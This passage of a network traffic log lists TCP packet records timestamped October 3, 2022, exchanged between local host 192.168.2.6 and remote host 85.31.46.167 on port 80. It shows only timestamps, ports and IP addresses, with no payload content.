Oct 3, 2022 17:42:25.627362013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627413034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627430916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627445936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627477884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627509117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627510071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627509117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627542019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627568007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627576113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627609015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627645016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627645016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627676964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627744913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627777100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627803087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.627847910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.627897024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:25.888555050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:25.895364046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:26.416445017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:26.416676044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:27.376538038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:27.376785994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:29.264543056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:29.264785051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.258392096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.258869886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.285780907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.285841942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.285891056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.285914898 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.285933018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.285968065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.285968065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.285976887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.285980940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286016941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286021948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.286061049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286065102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.286103964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286107063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.286144972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286149025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.286185980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.286191940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.286731958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313416958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313477039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313499928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313519955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313539982 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313564062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313566923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313606024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313606024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313649893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313652992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313690901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313694954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313734055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313736916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313776016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313779116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313817978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313817978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313860893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313878059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313905001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313924074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313949108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313960075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.313992023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.313997984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314035892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314043045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314084053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314096928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314110994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314136028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314152002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314167023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314208984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314208984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314251900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.314280987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.314295053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341437101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341497898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341527939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341540098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341572046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341582060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341586113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341624975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341628075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341670990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341670990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341712952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341713905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341756105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341761112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341798067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341805935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341825008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341854095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341866970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341870070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341908932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341912985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341957092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.341957092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.341999054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342001915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342040062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342041969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342082024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342083931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342123985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342128992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342164993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342170000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342206001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342207909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342247009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342248917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342289925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342293024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342331886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342334032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342374086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342374086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342417955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342417955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342459917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342459917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342503071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342504978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342545986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342550039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342587948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342590094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342629910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342631102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342670918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342672110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342714071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342714071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342755079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342756987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342796087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342798948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342838049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342843056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342890024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342909098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342952967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342955112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.342998981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.342999935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.343045950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.343086958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.343092918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.343092918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.343128920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.343128920 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.343178034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370424032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370477915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370500088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370549917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370556116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370610952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370629072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370652914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370654106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370696068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370697021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370738029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370739937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370783091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370784044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370826006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370826006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370868921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.370884895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370933056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.370970011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371017933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371046066 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371058941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371059895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371099949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371109009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371150970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371156931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371174097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371207952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371216059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371228933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371265888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371273041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371318102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371326923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371361017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371366024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371403933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371408939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371445894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371454954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371489048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371503115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371531010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371551991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371577024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371586084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371623039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371663094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371694088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371726036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371762991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371762991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371766090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371799946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371809006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371828079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371854067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371861935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371897936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371898890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371942043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371968985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.371984959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.371987104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372031927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372040033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372082949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372093916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372136116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372139931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372178078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372180939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372222900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372224092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372267962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372267962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372311115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372318983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372339010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372375965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372380972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372417927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372422934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372426033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372467041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372467995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372510910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372512102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372554064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372555971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372596025 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372596979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372638941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372642994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372684002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372687101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372725964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372740030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372772932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372797012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372803926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372833967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372839928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372843027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372881889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372889996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372926950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.372927904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372970104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.372977972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373013973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373014927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373059034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373060942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373100996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373104095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373145103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373145103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373189926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373193026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373231888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373234034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373275995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373275995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373318911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373321056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373361111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373363972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373404980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373406887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373446941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373450994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373490095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373492002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373532057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373534918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373574018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373577118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373619080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373620987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373665094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373667002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373708010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373709917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373752117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373754978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373795033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373800039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373836994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373838902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373879910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373883009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373924971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.373931885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.373975039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401161909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401226044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401269913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401297092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401312113 CEST	80	49711	85.31.46.167	192.168.2.6
